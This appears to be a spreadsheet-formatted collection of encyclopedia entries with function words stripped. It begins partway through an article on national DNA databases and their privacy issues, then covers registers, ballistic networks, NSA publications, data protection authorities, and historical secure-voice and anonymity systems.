medicine legal (lsjml) center forensic sciences (cfs). dubai 2017 dubai announced initiative called dubai planned create 'disruptive innovation' country. projects initiative database would collect genomes million citizens country 10-year period. intended data base finding genetic causes diseases creating personalised medical treatments. germany germany database german federal police (bka) 1998. late 2010, database contained profiles 700,000 individuals september 2016 contained 1,162,304 entries. 2011 "stop collection frenzy!" campaign various civil rights data protection organizations handed open letter german minister justice sabine leutheusser-schnarrenberger asking take action order stop "preventive expansion data-collection" "preemptive mere suspicions state apparatus individuals" cancel projects international exchange data european transatlantic level. israel israeli national database called israel police index system (ipdis) established 2007, collection 135,000 profiles. collection includes profiles suspected accused persons convicted offenders. israeli database also include “elimination bank” profiles laboratory staff police personnel contact forensic evidence course work. order handle high throughput processing analysis samples cards, israeli police database established semi-automated program lims, enables small number police finish processing large number samples relatively small period time, also responsible future tracking samples. kuwait kuwaiti government passed july 2015 requiring citizens permanent residents (4.2 million people) taken national database. reason security concerns isis suicide bombing imam sadiq mosque. they planned finish collecting september 2016 outside observers thought optimistic. october 2017 kuwait constitutional court struck saying invasion personal privacy project cancelled. brazil 1998, forensic research institute federal district civil police created databases sexual assault evidence. 2012, brazil approved national establishing databases state national levels regarding typing individuals convicted violent crimes. following decree presidency republic brazil 2013, regulates 2012 law, brazil began using codis addition databases sexual assault evidence solve sexual assault crimes brazil. france france database called fnaeg 1998. december 2009, 1.27 million profiles fnaeg. russia russia, scientific testing actively carried order study genetic diversity peoples russia framework state task learn determine probable territory human origin based data majority peoples country. june 2017, council ministers union state belarus russia adopted resolution approved scientific technical program union state "development innovative genogeographic genomic technologies identification personality individual characteristics person based study gene pools regions union state" (dna identification). within framework program, also planned include peoples neighboring countries, main source migration, genogeographic study basis existing collections. accordance federal december 2008 242-fz state genomic registration russian federation", voluntary state genomic registration citizens russian federation, well foreign citizens stateless persons living temporarily staying territory russian federation basis written application paid basis. genomic information obtained result state genomic registration used, among things, purpose establishing family relationships wanted (identified) persons. form keeping records data genomic registration citizens federal genomic information database (fbdgi). articles federal july 2006 152-fz personal data" provide processing special categories personal data relating race, nationality, political views, religious philosophical beliefs, health status, intimate life allowed necessary connection implementation international agreements russian federation readmission carried accordance legislation russian federation citizenship russian federation. information characterizing physiological biological characteristics person, basis possible establish identity (biometric personal data), processed without consent subject personal data connection implementation international agreements russian federation readmission, administration justice execution judicial acts, compulsory state fingerprinting registration, well cases stipulated legislation russian federation defense, security, anti-terrorism, transport security, anti-corruption, operational investigative activities, public service, well cases stipulated criminal-executive legislation russia, legislation russia procedure leaving russian federation entering russian federation, citizenship russian federation notaries. other european countries comparison european countries, netherlands largest collector profiles citizens. moment databank netherlands forensic institute contains profiles 316,000 dutch citizens.contrary situation european countries, dutch police wide-ranging powers take retain samples subject convicted recordable offence, except conviction involves paying fine. subject refuses, example privacy concerns, dutch police force. sweden, profiles criminals spent years prison stored. norway germany, court orders required, available, respectively, serious offenders convicted certain offences likely reoffend. austria started criminal database 1997 italy also 2016 switzerland started temporary criminal database 2000 confirmed 2005.in 2005 incoming portuguese government proposed introduce database entire population portugal. however, informed debate including opinion portuguese ethics council database introduced criminal population.genuity science (formerly genomics medicine ireland) irish life sciences company founded 2015 create scientific platform perform genomic studies generate disease prevention strategies treatments. company founded group life science entrepreneurs, investors researchers scientific platform based work amgen’s icelandic subsidiary, decode genetics, pioneered genomic population health studies. company building genomic database include data cent irish population, including patients various diseases healthy people. idea private company owning public data raised concerns, irish times editorial stating: date, ireland seems adopted entirely commercial approach genomic medicine. this approach places risk free availability genomic data scientific research could benefit patients." paper's editorial pointed stark contrast approach u.k. taken, publicly charitably funded 100,000 genomes project carried genomics england. china 2020 chinese police collected million profiles. there concerns china using data crime solving, tracking activists, including uyghurs. india india announced launch genomic database fall 2019. first phase "genome india" genomic data 10,000 indians catalogued. department biotechnology (dbt) initiated project. first private bank india lucknow capital indian state uttar pradesh. unlike research center, available public store paying minimum amount four drops blood. corporate ancestry reported collected million samples november 2018. 23andme's database contained genetic information nine million people worldwide 2019. company explores selling "anonymous aggregated genetic data" researchers pharmaceutical companies research purposes patients give consent. ahmad hariri, professor psychology neuroscience duke university using 23andme research since 2009 states important aspect company's service makes genetic research accessible relatively cheap scientists. study identified genome sites linked depression 23andme's database lead surge demands access repository 23andme fielding nearly requests access depression data weeks publication paper. heritage said database million profiles 2019. family tree reported million people database 2019. compression databases occupy storage compared databases enormous size sequence. every year databases grow exponentially. this poses major challenge storage, data transfer, retrieval search databases. address challenges databases compressed save storage space bandwidth data transfers. they decompressed search retrieval. various compression algorithms used compress decompress. efficiency compression algorithm depends well fast compresses decompresses, generally measured compression ratio. greater compression ratio, better efficiency algorithm. time, speed compression decompression also considered evaluation. sequences contain palindromic repetitions compression sequences involve locating encoding repetitions decoding decompression. some approaches used encode decode are: huffman encoding adaptive huffman encoding arithmetic coding arithmetic coding context tree weighting (ctw) methodthe compression algorithms listed encoding approaches compress decompress database compression using redundancy sets (comrad) relative lempel-ziv (rlz) gencompress biocompress dnacompress ctw+lzin 2012, team scientists johns hopkins university published first genetic compression algorithm rely external genetic databases compression. hapzipper tailored hapmap data achieves 20-fold compression (95% reduction file size), providing 4-fold better compression much faster leading general-purpose compression utilities.genomic sequence compression algorithms, also known sequence compressors, explore fact sequences characteristic properties, inverted repeats. successful compressors geco. eukaryotes slightly better compression ratio, though sequences larger computational requirements impractical. medicine many countries collect newborn blood samples screen diseases mainly genetic basis. mainly destroyed soon testing. countries dried blood (and dna) retained later testing. denmark danish newborn screening biobank statens serum institut keeps blood sample people born 1981. purpose test phenylketonuria diseases. however, also used profiling identify deceased suspected criminals. parents request blood sample newborn destroyed result test known. privacy issues critics databases warn various uses technology pose threat individual civil liberties. personal information included genetic material, markers identify various genetic diseases, physical behavioral traits, could used discriminatory profiling collection constitute invasion privacy. also, used establish paternity whether child adopted. nowadays, privacy security issues database caused huge attention. some people afraid personal information easily, others define profiles recording databases sense "criminal", falsely accused crime lead "criminal" record rest lives. laws 2001 2003 allowed profiles taken immediately person arrested kept database even suspect later acquitted. response public unease provisions, later changed passing protection freedoms 2012 required suspects charged found guilty would data deleted database.in european countries established database, measures used protect privacy individuals, specifically, criteria help removing profiles databases. among european countries analyzed, countries record profiles suspects committed serious crimes. countries (like belgium france) remove criminal's profile 30–40 years, “criminal investigation” database longer needed. most countries delete suspect's profile acquitted...etc. countries completed legislation largely avoid privacy issues occur database. public discussion around introduction advanced forensic techniques (such genetic genealogy using public genealogy databases phenotyping approaches) limited, disjointed, unfocused, raises issues privacy consent warrant additional legal protections established.privacy issues surrounding databases means privacy threatened collecting analyzing samples, also exists protecting storing important personal information. profiles stored indefinitely database, raised concerns samples used unidentified purposes. with increase users access database, people worried information shared inappropriately, example, profile shared others enforcement agencies countries without individual consent.the application databases expanded controversial areas: arrestees familial searching. arrestee person arrested crime convicted offense. currently, states united states passed legislation allows enforcement take arrestee enter state's codis database person criminal record linked unsolved crimes. familial searching, database used look partial matches would expected close family members. this technology used link crimes family members suspects thereby help identify suspect perpetrator sample database.furthermore, databases could fall wrong hands data breaches data sharing. collection human rights judgement december 2008, european court human rights ruled british fingerprints retained police saying retention "could regarded necessary democratic society".the fingerprinting pioneer professor alec jeffreys condemned government plans keep genetic details hundreds thousands innocent people england wales years. jeffreys said "disappointed" proposals, came european court ruled current policy breaches people's right privacy. jefferys said seems minimal response european court human rights judgment could conceive. there presumption innocence future guilt find disturbing indeed". effects crime 2021 study found registration danish criminal offenders database substantially reduced probability re-offending, well increased likelihood re-offenders identified committed future crimes.a 2017 study american economic journal: applied economics showed databases criminal offenders' profiles states "deter crime profiled offenders, reduce crime rates, cost-effective traditional enforcement tools." monozygotic twins monozygotic twins share around 99.99% dna, siblings share around 50%. some next generation sequencing tools capable detecting rare novo mutations twins (detectable rare single nucleotide polymorphisms). most testing tools would detect rare snps twins. each person's unique slight exception identical (monozygotic monospermotic) twins, start identical genetic line twinning event incredibly small mutations detected (for intents purposes, compared humans even theoretical "clones, [who would share uterus experience mutations pre-twinning event]" identical twins identical probably possible achieve humans). tiny differences identical twins (2014) detected next generation sequencing. current fiscally available testing, "identical" twins cannot easily differentiated common testing, shown possible. while siblings (including fraternal twins) share dna, monozygotic twins share virtually 99.99%. beyond recently discovered twinning-event mutation disparities, since 2008 known people identical twins also copy number variants, thought number copies personally exhibit certain sections dna. also combined index system (codis) profiling forensic science service government databases forensics national database references</t>
  </si>
  <si>
    <t>National Health Service Central Register</t>
  </si>
  <si>
    <t>national health service central register (nhscr) scottish government database accessible public bodies approved scottish parliament. register established early 1950s facilitate transfer patients health board areas across borders within countries united kingdom. however, role expanded decades also provides scottish local authorities unique citizen reference number ucrn used identify people databases.in 2006, scottish government national records scotland made major expansion applications nhscr changing regulations section local electoral administration registration services (scotland) 2006. 2015, scottish government proposed expanding access nhscr additional public bodies. associated consultation received responses. proposed expansion criticised open rights group, believed breach data protection rules human rights resembles national identity system. february 2017, scottish government informed scottish parliament intend proceed proposals. community health index community health index register patients scotland, scotland's publicly funded healthcare system. register exists ensure patients correctly identified, information pertaining patient's health available providers care.patients identified using ten-digit number known number, pronounced /ˈkaɪ/. this number normally formed using patient's date birth ddmmyy), followed four digits: digits randomly generated, third digit identifying gender (odd men, even women) check digit (modulus-11). march 2010, uptake number (based radiology requests) varied across scotland 96.5% 99.9% depending local board. pharmacy number included electronic medical referencing systems, (acute medicine service), (chronic medicine service) (minor ailment scheme). connect scotland's epharmacy contains details medical patients scotland. also number registration district scottish national entitlement card references external links national health service central register national records scotland</t>
  </si>
  <si>
    <t>National Integrated Ballistic Information Network</t>
  </si>
  <si>
    <t>national integrated ballistic information network nibin specialized computer network united states. contains digital images recovered pieces ballistic evidence. running integrated ballistic identification system ibis platform, nibin enables u.s. enforcers rapidly determine piece recovered ballistic evidence came firearm previously used crime. there certain criteria must prior entering information nibin database. instance, cartridge cases caliber firearm revolver normally entered.using nibin, enforcement staff identify firearms cases used prior incidents. series seventeen different washington state crime scenes involving seven firearms, three different agencies counties, identified using information provided ibis/nibin. organizational purpose 1999, bureau alcohol, tobacco, firearms explosives (atf) established began administration national integrated ballistic information network. program, administers automated ballistic imaging technology enforcement, forensic science, attorney agencies united states entered formal agreement enter ballistic information nibin. partners integrated ballistic identification systems acquire digital images markings made spent ammunition recovered crime scene crime test fire compare images earlier entries electronic image comparison. high-confidence candidate match emerges, firearms examiners compare original evidence microscope confirm match. also automated firearms identification integrated ballistic identification system references</t>
  </si>
  <si>
    <t>National Security Agency academic publications</t>
  </si>
  <si>
    <t>united states' national security agency (nsa), intelligence agency federal government, publishes many documents history technology cryptology, cryptography, cryptanalysis various publications. cryptolog published monthly techniques standards, personnel operations". declassified issues available online. cryptologic almanac cryptology academic journal published internally nsa. publishes short vignettes nsa-related topics. selection articles published available public online. cryptologic quarterly combined result merger technical journal cryptologic spectrum 1981. expanded coverage cover larger segment readership. cryptologic spectrum cryptology journal published internally nsa. established 1969, consolidation technical journal 1981. selection articles published 1969 1981 available public online. journal classified tables contents published online september 2006 following freedom information request 2003. technical journal established 1954 ralph canine "foster exchange ideas create 'intellectual community' within agency". 1981, publication consolidated cryptologic spectrum single publication, called cryptologic quarterly. also military cryptanalytics world factbook world leaders references external links declassification transparency page website</t>
  </si>
  <si>
    <t>National Security League</t>
  </si>
  <si>
    <t>national security league (nsl) american patriotic, nationalistic, nonprofit, nonpartisan organization supported greatly-expanded military based upon universal service, naturalization americanization immigrants, americanism, meritocracy, government regulation economy enhance national preparedness. many programs advocated nsl, unified national defense agency, interstate highway system, universal conscription, english official language, unified national budget, highly influential. although organization declined finally folded 1942, many ideas would become national policy united states. foundation national security league founded attorney solomon stanwood menken general leonard wood december 1914, impetus formation group representative augustus peabody gardner. funding, menken sought publisher george putnam. putnam encouraged menken appoint honorary president lend organization prestige give access respected speakers additional funding. menken putnam settled joseph choate first president. menken served nsl's first executive director. national committee formed, eventually members, university presidents, bankers, cabinet secretaries, state governors.the national security league emerged national political scene middle june 1915 "conference peace preparation," conducted york city. although participants conclave hailed peace groups, great majority participants advocates military "preparedness." conference cemented nsl's place leader among military preparedness movement months american intervention war. august 1915, splinter group formed american defense society, largely composed republicans unhappy nsl's uncritical support administration president woodrow wilson.despite factionalism, 1916, 50,000 members chapters states. beliefs program drew members supporters wide range political spectrum, policies changed dramatically time. progressives, democrats, republicans supported organization early years.initially, worked indoctrinate school children public. under guise encouraging teaching history, league worked eliminate teaching foreign languages, especially german, later russian. encouraged physical education schools means "strengthening american manhood" war. advocating civil defense, league proselytized defense spending stronger national military. opposed women's suffrage, viewed part "wave effeminacy" threatening nation.this "americanism" universal conscription meant strengthen military also weed "religious political dissenters, sexual 'deviants,' frequented prostitutes, people convicted crimes completed punishment...." goal create elite meritocratic class would take decision-making away electorate.the reached highest point influence terms popular support adoption policies world whipped germanophobia committee patriotism through education, directed princeton university professor robert mcnutt mcelroy, strongly supported espionage 1917 sedition 1918. with support department justice, began question patriotism loyalty thousands americans suspected pro-german later, communists. league supporters published newspaper stories wrote letters editor alleging labor unions, universities, churches (particularly large ethnic german congregations), league women voters, host organizations communist control. decline lost much political influence incidents 1918. incident happened april 1918, mcelroy accused practically every citizen wisconsin treason. mcelroy addressing university wisconsin army junior cadets rain college's campus. acoustics made difficult hear him, cadets fidgeted throughout speech. mcelroy grew increasingly angry spoke, convinced cadets ignoring him. finally, mcelroy, whether exasperation truly believed accused students university's faculty treason. however, since could hear him, response statement. mcelroy broadened accusation include chief justice wisconsin supreme court, also attendance, entire population state disloyalty well. make matters worse, mcelroy published accusations number newspaper articles. when word mcelroy's statements made known, public press turned accused xenophobia fanaticism. many mainstream supporters league, unaware jingoistic tendencies senior members organization's inner circle, quit protest.the incident involved massive political operation 1918 midterm elections. league formed first known political action committee united states spent $100,000 defeat representatives opposed policies. established rating system analyze variety congressional votes preparedness measures considered critical. however, many votes seemed little national defense ignored complexities congressional voting, often involved parliamentary procedure, up-or-down voting, amendment process, logrolling agenda setting strategies. many members congress higher defense spending often scored quite nsl's rating system. that appear concern league, directed mass mailings vituperative press campaigns members congress. campaign appeared effect, number important members congress went defeat, democrats lost control house.during lame duck session congress election, democrats sought expose practices nsl. house speaker champ clark appointed special investigative committee investigate league's actions. surprisingly, committee's members suffered wrath league. committee found violated federal corrupt practices act.menken lost position executive director league house investigation.with close world league became stridently anticommunist reactionary. honorary president charles lydecker, york state national guard colonel league's executive director, began advocating extreme form property rights. lydecker soon began attacking progressives unions communists. lydecker's successor, york businessman charles daniel orth subsequently pushed league advocate quasi-fascist centralization national economy ensure nation's security. orth proposed even repressive less democratic measures, demanding "education campaigns" indoctrinate americanism immigrants children pogrom drive radicals nation's institutions higher education. longtime league supporters, samuel gompers albert bushnell hart, withdrew support, league sank extremism irrelevancy.lieutenant general robert bullard became nsl's last president, taking 1925.the league went bankrupt 1939. survived paper 1942, bullard running manhattan apartment. bullard closed league 1942. references sources asinof, eliot. 1919: america's loss innocence dutton, inc., 1990. isbn 1-55611-150-9 chambers john whiteclay. raise army: draft comes modern america free press, 1987. coben, stanley. study nativism: american scare 1919–20 irvington publishers, 1991. cooper, henry allen. national security league washington, u.s. government printing office, 1919 damon, allan "the great scare," american heritage 19:2 (february 1968) edwards, john carver. patriots pinstripe: national security league washington, university press america, 1982. edwards, john carver. "the price political innocence: role national security league 1918 congressional election," military affairs 42:4 (1978) "epic lobby" time. september 1929 feuerlicht, roberta america's reign terror: world scare, palmer raids random house, 1971. fischer, nick. "the founders american anti-communism," american communist history (june 2006). franz, manuel. "preparedness revisited: civilian societies campaign american defense, 1914-1920," journal gilded progressive 17:4 (2018): 663–676. herzberg, david. "thinking through war: social thought richard ely, john commons, edward ross during first world war," journal history behavioral sciences 37:2 (may 2001). irwin, mary ann. "the becoming full war," pacific historical review 74:3 (august 2005). murray, robert scare: study national hysteria, 1919–1920 reprint westport, greenwood publishing, 1990. "national security league," encyclopedia gilded progressive era, john buenker, joseph buenker, al., eds. armonk, m.e. sharpe, 2004. pearlman, michael. make democracy safe america: patricians preparedness progressive urbana: university illinois press, 1984. ricento, thomas. "the discursive construction americanism." discourse society 14:5 (2003) rothbard, murray "wall street, banks, american foreign policy," world market perspective 1984 ruotsila, markku. "neoconservatism prefigured: social democratic league america anticommunists anglo-american right, 1917–21," journal american studies 40:2 (august 2006). "russian recruits." time september 1930. shulman, mark "the progressive origins national security act," dickinson review (winter 2000) "theodore roosevelt dies suddenly oyster home," york times january 1919 u.s. house representatives. hearing before special committee house representatives, sixty-fifth congress, third session res. res. investigate make report officers, membership, financial support, expenditures, general character, activities, purposes national security league, corporation york, associated organizations. washington, government printing office, 1918. schaack, eric. "the coming hun! american fears german invasion, 1918," journal american culture 28:3 (september 2005). ward, robert "the origin activities national security league, 1914-1919," mississippi valley historical review 47:1 (june 1960), 51–65. jstor. zeiger, susan. "the schoolhouse armory: u.s. teachers campaign against militarism schools, 1914-1918," journal women's history 15:2 (summer 2003) external links frothingham, arthur handbook facts peace problems. washington, d.c.: national security league, 1919. accessed jan. 2007 raico, ralph. "american foreign policy turning point, 1898–1919, part 1995. future freedom foundation.</t>
  </si>
  <si>
    <t>National data protection authority</t>
  </si>
  <si>
    <t>there several national data protection authorities across world, tasked protecting information privacy. european union efta member countries, status formalized data protection directive involved madrid resolution. this project part work international commission united nations. authorities group states european level, european data protection supervisor (edps). process backed 2005 council europe, world summit information society (tunis, november 2005), 2006/2007 within forums internet governance (athens 2006, 2007). june 2007, oecd recommendation regarding "trans-frontier cooperation legislations protecting privacy enforcement" adopted. aimed particular "improve national privacy enforcements national authorities better cooperate foreign authorities place efficient international mechanisms ease trans-frontier cooperation legislations protecting privacy enforcement". ibero-american network data protection exists. 2008, meeting, colombia, declaration asking international conferences data protection privacy "pursue efforts, regardless geographical location, order adopt common legal instruments". another network central eastern data protection authority (cedpa). this network expressed pursue strengthen activities within cedpa, notably elaborate common solutions assist members establishment data protection legislation. that june 2008 meeting poland. list national data protection authorities european economic area austria: austrian data protection authority (german: datenschutzbehörde) belgium: belgian data protection authority (dutch: gegevensbeschermingsautoriteit (gba), french: autorité protection données (apd), german: datenschutzbehörde), also known apd-gba bulgaria: bulgarian data protection authority (bulgarian: комисия защита личните данни) cyprus: office commissioner personal data protection (greek: γραφείο επιτρόπου προστασίας δεδομένων προσωπικού χαρακτήρα) czech republic: office personal data protection (czech: úřad ochranu osobních údajů (úooú)) denmark: danish data protection agency (danish: datatilsynet) estonia: estonian data protection inspectorate (estonian: andmekaitse inspektsioon) finland: office data protection ombudsman (finnish: tietosuojavaltuutetun toimisto) france: commission nationale l'informatique libertés (lit. 'national commission informatics liberty'), also known cnil germany: federal commissioner data protection freedom information (german: bundesbeauftragter datenschutz informationsfreiheit (bfdi)) note: competent supervisory authorities enforcement data protection private sector respective state authorities. greece: hellenic data protection authority (greek: αρχή προστασίας δεδομένων προσωπικού χαρακτήρα), also known hdpa hungary: hungarian national authority data protection freedom information (hungarian: nemzeti adatvédelmi információszabadság hatóság (naih)) iceland: data protection authority (icelandic: persónuvernd) ireland: data protection commissioner (irish: coimisinéir cosanta sonraí), also known italy: italian data protection authority (italian: garante protezione dati personali), also known italian latvia: data state inspectorate (latvian: datu valsts inspekcija, russian: государственная инспекция данных) liechtenstein: datenschutzstelle lithuania: state data protection inspectorate (lithuanian: valstybinė duomenų apsaugos inspekcija (vdai)) luxembourg: national commission data protection (german: nationale kommission datenschutz, french: commission nationale pour protection données), also known cnpd malta: office information data protection commissioner, also known idpc netherlands: dutch data protection authority (dutch: autoriteit persoonsgegevens (ap)) norway: norwegian data protection authority (norwegian: datatilsynet) poland: polish data protection commissioner (polish: urząd ochrony danych osobowych (uodo)) portugal: national commission data protection (portuguese: comissão nacional proteção dados (cnpd)), also known ncdp romania: national authority supervision personal data processing (romanian: autoritatea naţională supraveghere prelucrării datelor caracter personal), also known anspdcp slovakia: office personal data protection slovak republic (slovak: úrad ochranu osobných údajov slovenskej republiky) slovenia: information commissioner republic slovenia (slovene: republika slovenija informacijski pooblaščenec) spain: spanish data protection agency (spanish: agencia española protección datos (aepd)) andalusia: transparency data protection council andalusia (spanish: consejo transparencia protección datos andalucía) basque country: basque data protection authority (basque: datuak babesteko euskal bulegoa, spanish: agencia vasca protección datos) catalonia: catalan data protection authority (catalan: autoritat catalana protecció dades (apdcat)) sweden: swedish data protection authority (swedish: datainspektionen), also known swedish united kingdom: information commissioner's office, also known europe albania: information data protection commissioner (idp) (komisionerit drejtën informimit mbrojtjen dhënave personale (kdimdp)) andorra: data protection agency andorra (catalan: agència andorrana protecció dades (apda)) croatia: croatian personal data protection agency (croatian: agencija zaštitu osobnih podataka (azop)) guernsey: data protection office north macedonia: directorate personal data protection (macedonian: дирекција заштита лични податоци) isle man: office data protection supervisor monaco: commission contrôle informations nominatives (lit. 'personal data control board'), also known ccin russia: federal service supervision sphere telecom, information technologies mass communications (roskomnadzor) serbia: commissioner information public importance personal data protection (serbian: повереник информације јавног значаја заштиту података личности) switzerland: federal data protection information commissioner (german: eidgenössischer datenschutz- öffentlichkeitsbeauftragter (edöb), french: préposé fédéral protection données transparence (pfpdt), italian: incaricato federale della protezione dati della trasparenza (ifpdt)), also known fdpic turkey: turkish data protection authority (turkish: kişisel verileri koruma kurumu (kvkk)) ukraine: ukrainian parliament commissioner human rights (ukrainian: уповноважений верховної ради україни прав людини) africa angola: data protection agency (portuguese: agência proteção dados), known egypt: national authority responsible data protection. ghana: data protection commission morocco: commission nationale contrôle protection données caractère personnel (lit. 'national commission control protection personal data'), also known cndp mozambique: national authority responsible data protection. nigeria: national information technology development agency (nitda) nigerian communications commission (ncc) provide services regarding data protection. south africa: information regulator tunisia: national authority protection personal data (french: instance nationale protection données personnelles), known inpdp zimbabwe: there currently data protection authority zimbabwe media commission comments degree protection privacy public bodies programs. asia china: cyberspace administration china (cac) hong kong: office privacy commissioner personal data (pcpd) india: national authority responsible data protection. indonesia: national authority responsible data protection. israel: privacy protection authority (hebrew: הרשות להגנת הפרטיות) japan: personal information protection commission kazakhstan: data protection regulated state. macau: office personal data protection, known opdp malaysia: there personal data protection commissioner pakistan: national authority responsible data protection. philippines: national privacy commission qatar: qatar ministry transport communications saudi arabia: national authority responsible data protection. singapore: personal data protection commission created following personal data protection 2012 (singapore) south korea: korea communications commission taiwan: national authority responsible data protection. thailand: office personal data protection committee turkmenistan: national authority responsible data protection. uzbekistan: regulators data protection sector-specific. oceania australia: office australian information commissioner zealand: privacy commissioner (new zealand) north america canada: office privacy commissioner canada (french: commissariat protection privée canada) mexico: national institute transparency access information personal data protection (spanish: instituto nacional transparencia, acceso información protección datos personales (inai)) usa: there single national authority. south america argentina: dirección nacional protección datos personales (lit. 'national directorate personal data protection'), known bolivia: national authority responsible data protection. brazil: national data protection authority (anpd) chile: there dedicated authority. colombia: superintendency industry commerce (sic) costa rica: agency protection individual's data (spanish: agencia protección datos habitantes), known prodhab dominican republic: national authority responsible data protection. honduras: national civil registry (spanish: registro nacional personas) institute access public information (spanish: instituto acceso informacion publica) panama: national authority responsible data protection. peru: ministerio justicia derechos humanos (perú) (lit. 'ministry justice human rights') uruguay: personal data control regulatory unit. venezuela: national authority responsible data protection. also references external links list national data protection authorities europe international conference data protection privacy commissioners handbook european data protection comparison data protection laws around world</t>
  </si>
  <si>
    <t>Navajo I</t>
  </si>
  <si>
    <t>navajo secure telephone built briefcase developed u.s. national security agency. according information display 2002 nsa's national cryptologic museum, units built 1980s senior government officials traveling. uses linear predictive coding algorithm lpc-10 kilobits/second. name likely reference navajo code talkers world sources display labels [1]. also stu-ii scip</t>
  </si>
  <si>
    <t>NetShade</t>
  </si>
  <si>
    <t>netshade provides access anonymous proxy servers. these servers include public http/https proxies, well rayner software's subscription-based proxies. netshade's servers ipsec, proxy servers using http/https proxy standard. history netshade version released 2004 first version subscription-based proxy service, listing public proxies. dedicated netshade proxy server added version 2005. version released 2007, added second netshade proxy server, providing presence current version, 7.0.1, includes dedicated proxy servers canada, czech republic, germany, france, italy, netherlands. used circumvent internet censorship, experience censorship like countries china. references</t>
  </si>
  <si>
    <t>National Cipher Challenge</t>
  </si>
  <si>
    <t>national cipher challenge annual cryptographic competition organised university southampton school mathematics. competitors attempt break cryptograms published competition website. 2007/08 challenge, 1301 teams participated. participants must full-time education aged august year challenge finishes. format competition organised eight challenges, subdivided parts part challenge consists comparatively simpler cryptogram, usually provides useful information assist solving part part usually complex. later challenges cryptograms become harder break. past, part cryptograms encrypted caesar cipher, affine cipher, keyword cipher, transposition cipher, vigenère cipher hill cipher. part challenges intended harder. these begin relatively simple substitution ciphers, including bacon cipher polybius square, moving transposition ciphers, playfair ciphers polyalphabetic ciphers vigenère cipher, autokey cipher alberti cipher. later stages competition, adfgvx cipher, solitaire cipher, double playfair cipher, hill cipher, book cipher versions enigma fialka cipher machines used. 2009 challenge ended jefferson disk cipher, 2012 challenge ended adfgvx cipher, 2014 playfair cipher, recent challenge ended sectioned cadenus transposition. prizes cash prizes awarded eight random entrants submit correct solution part challenge. leaderboards part challenges also compiled, based accurate solutions quickly entrant broke cipher. prizes awarded three entrants challenge. 2009/10 challenge, sponsors provided several prizes: provided ipod touches member team winning team prize, trinity college provided cash prize £700, gchq provided cash prize £1000. previous years prizes thinkpad laptop awarded. after challenge winners prizes randomly selected entrants invited held bletchley park consisting lectures (with subjects semantic web, world cryptography computer programming) prize-giving ceremony. current sponsors competition include gchq, ibm, british computer society, trinity college, cambridge, cambridge university press, winton capital management epsrc. external links official challenge website website 2016/17 challenge (slightly broken) website 2015/16 challengethe websites challenges earlier longer available.</t>
  </si>
  <si>
    <t>Netsukuku</t>
  </si>
  <si>
    <t>netsukuku experimental peer-to-peer routing system, developed freaknet medialab 2005, created build distributed network, anonymous censorship-free, fully independent necessarily separated internet, without support server, central authority. netsukuku designed handle 2128 nodes without servers central systems, minimal memory resources. this mesh network built using existing network infrastructure components wi-fi. project slow development since 2005, never abandoning beta state. also never tested large scale. operation december 2011, latest theoretical work netsukuku could found author's master thesis scalable mesh networks address space balancing problem. following description takes account basic concepts theory. netsukuku uses custom routing protocol called qspn (quantum shortest path netsukuku) strives efficient taxing computational capabilities node. current version protocol qspnv2. adopts hierarchical structure. nodes grouped inside gnode (group node), gnodes grouped single ggnode (group group nodes), ggnodes grouped single gggnode, this offers advantages main documentation. protocol relies fact nodes mobile network structure change quickly, several minutes required change network propagated. however, node joins network immediately able communicate using routes neighbors. when node joins mesh network, netsukuku automatically adapts nodes come know fastest efficient routes communicate newcomer. each node privileges restrictions nodes. domain name system (dns) replaced decentralised distributed system called andna (abnormal netsukuku domain name anarchy). andna database included netsukuku system, node includes database occupies kilobytes memory. simplifying, andna works follows: resolve symbolic name host applies function hash behalf. hash function returns address host contacts asking resolution generated hash. contacted node receives request, searches andna database address associated name returns applicant host. recording works similar way: example, let's suppose node wants register address freaknet.andna; calculates hash name obtains address 11.22.33.44 associated node node contacts asking register 11.22.33.44 own. stores request database request resolution 11.22.33.44 hash, answer address. protocol little complex this, system provides public/private authenticate hosts prevent unauthorized changes andna database. furthermore, protocol provides redundancy database make protocol resistant failure also provides migration database network topology changes. protocol provide possibility revoking symbolic name; certain period inactivity (currently days) simply deleted database. protocol also prevents single host recording excessive number symbolic names present names) order prevent spammers storing high number terms perform cybersquatting. related items freifunk anonymous b.a.t.m.a.n. digital divide freenet gnunet anonymous network mesh network (anonymity network) wireless community network external links official website freaknet medialab netsukuku anarchial parallel internet wayback machine (archived january 2016) draw katanas, netsukuku (the internet obsolete) ntskk codice segreto rivoluzione february 2010 italian wired magazine story netsukuku andna: distributed hostname management system netsukuku netsukuku subreddit netsukuku subreddit. netsukuku mailing list netsukuku mailing list. alternative internet netsukuku french linux.org article netsukuku.</t>
  </si>
  <si>
    <t>NESTOR (encryption)</t>
  </si>
  <si>
    <t>nestor family compatible, tactical, wideband secure voice systems developed u.s. national security agency widely deployed vietnam late cold period 1980s. nestor consists three systems. ky-8 used vehicular afloat applications; ky-28 airborne version; ky-38 portable man-pack model. about 30,000 nestor equipments produced prior replacement vinson secure voice family.: p.79 keying accomplished setting switch matrix switches several positions. this done using separate mechanical loader (kyk-28) matching matrix pins could different heights instructed list. loader pushed matrix holes, hole switch. loader also larger index pins also cocked spring would return switch initial position door covering hole matrix reopened, zeroizing equipment. vietnam experience gave high priority deploying nestor systems vietnam. equipment issued field units vietnam beginning 1965 ky-8 stationary vehicular use; ky-8 fully distributed third quarter fiscal year 1968. ky-28 issued aircraft beginning 1967, ky-38 man-pack mobile use. ky-38 fully distributed 1968. nestor successfully used situations, overall experience good. estimates units actually used. variety problems contributed rejection:: p.43ff voice quality poor nestor reduced range radios 10%. while happen tests carefully tuned radios, field. roughly 600-millisecond delay nestor enabled radios would synchronize "push talk" intolerable pilots air-to-air combat. while ky-28 easily incorporated bomber (e.g., b-52), attack (e.g., ac-119, ac-130), large reconnaissance (e.g., p-3, rc-135) command control (e.g., ec-121, e-1, e-2) aircraft initial introduction, finding room ky-28 fighter aircraft difficult. navy improvised successfully, example tucking ky-28s nose wheel well phantoms, force initiated formal modification program took years complete. ground version, ky-8 work high temperatures common country, leading jury-rigged cooling solutions, like wrapping units burlap, drilling unauthorized holes case. human portable version, ky-38, marvel miniaturization time, still heavy. ky-38 plus an/prc-77 radio spare batteries weighed pounds (24.5 kg). experiments marines carry separate units cable worked poorly jungle. many units decided ammunition better carrying capacity. lack cables connect nestor equipment radios proved major problem never fully solved lack coordination three separate organizations responsible procuring encryption systems, radios, cables. large batch replacement cables lost cargo plane crash. doctrine called limiting number radios (250 first, later 400) network common key, limit risk compromise. this meant units could sometimes communicate units field highly mobile war. eventually relax restriction air-ground communication since aircraft could anywhere. also, ground forces used radios, aircraft used limiting secure cross-communication units equipped compatible nestor-equipped radios. some commanders 